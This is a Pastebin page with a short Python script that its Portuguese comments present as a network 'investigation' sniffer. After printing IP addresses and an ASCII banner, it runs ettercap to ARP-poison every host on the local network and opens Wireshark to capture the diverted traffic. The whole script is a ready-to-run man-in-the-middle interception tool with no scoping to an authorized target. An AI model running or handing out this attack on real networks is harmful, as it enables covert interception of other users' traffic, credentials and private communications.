DarkProgrammer000

Investigate [sniff+arpSpoof]

Aug 5th, 2021
1,107
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. """
  2. Programa: Sniffer ShellScript + Python3 -> Desvendando possiveis crimes na rede interna
  3. """
  4.  
  5. # Bibliotecas
  6. from os import system
  7. from time import sleep
  8. from threading import Thread
  9.  
  10. # Apresentacao
  11. def apresentacao():
  12.  
  13.     # Comando de sistema
  14.     system("clear")
  15.     print("\033[01;31m # DARK PROGRAMMER 000 \033[01;37m")
  16.  
  17.     # IP externo
  18.     system("echo -n ' # IP [externo]: '")
  19.     system("curl ifconfig.me --silent | awk {'print $1'}")
  20.  
  21.     # IP interno
  22.     system("echo -n ' # IP [interno]: '")
  23.     system("hostname -I | awk {'print $1'}")
  24.  
  25.     # Simbolo
  26.     print('''\033[01;32m
  27.                   ..:::::::::..
  28.                  ..:::aad8888888baa:::..
  29.              .::::d:?88888888888?::8b::::.
  30.            .:::d8888:?88888888??a888888b:::.
  31.          .:::d8888888a8888888aa8888888888b:::.
  32.         ::::dP::::::::88888888888::::::::Yb::::
  33.        ::::dP:::::::::Y888888888P:::::::::Yb::::
  34.       ::::d8:::::::::::Y8888888P:::::::::::8b::::
  35.      .::::88::::::::::::Y88888P::::::::::::88::::.
  36.      :::::Y8baaaaaaaaaa88P:T:Y88aaaaaaaaaad8P:::::
  37.      :::::::Y88888888888P::|::Y88888888888P:::::::
  38.      ::::::::::::::::888:::|:::888::::::::::::::::
  39.      ::::::::::::::::8888888888888b::::::::::::::'
  40.       :::::::::::::::88888888888888::::::::::::::
  41.        :::::::::::::d88888888888888:::::::::::::
  42.         ::::::::::::88::88::88:::88::::::::::::
  43.           ::::::::::88::88::88:::88::::::::::'
  44.             ::::::::88::88::P::::88::::::::'
  45.               ::::::88::88:::::::88::::::'
  46.                 ::::::::::::::::::::
  47.                       ::::::::::
  48.                       \033[01;37m''')
  49.    
  50.     # Mensagem
  51.     print("\033[01;31m Investigacao ativada \033[01;37m")
  52.     sleep(2)
  53.  
  54. # Metodo: Envenenando ARP
  55. def arpSpoofing():
  56.  
  57.     # ArpPoisoning: Atentar para a placa de rede
  58.     system("ettercap -Tqi eth0 -M arp ///")
  59.  
  60. # Metodo: Analisador de trafego da rede
  61. def wireshark():
  62.  
  63.     # Apresentacao
  64.     system("wireshark")
  65.  
  66. # Metodo: Principal
  67. def main():
  68.  
  69.     # Chamada de metodo
  70.     apresentacao()
  71.    
  72.     # Montagem de Threads
  73.     threading_ArpSpoofing = Thread(target=arpSpoofing)
  74.     threading_WireShark = Thread(target=wireshark)
  75.  
  76.     # Start
  77.     threading_ArpSpoofing.start()
  78.     threading_WireShark.start()
  79.  
  80. # Execucao
  81. if __name__ == '__main__':
  82.  
  83.     try:
  84.         main()
  85.  
  86.     except Exception as erro:
  87.         print(erro)
RAW Paste Data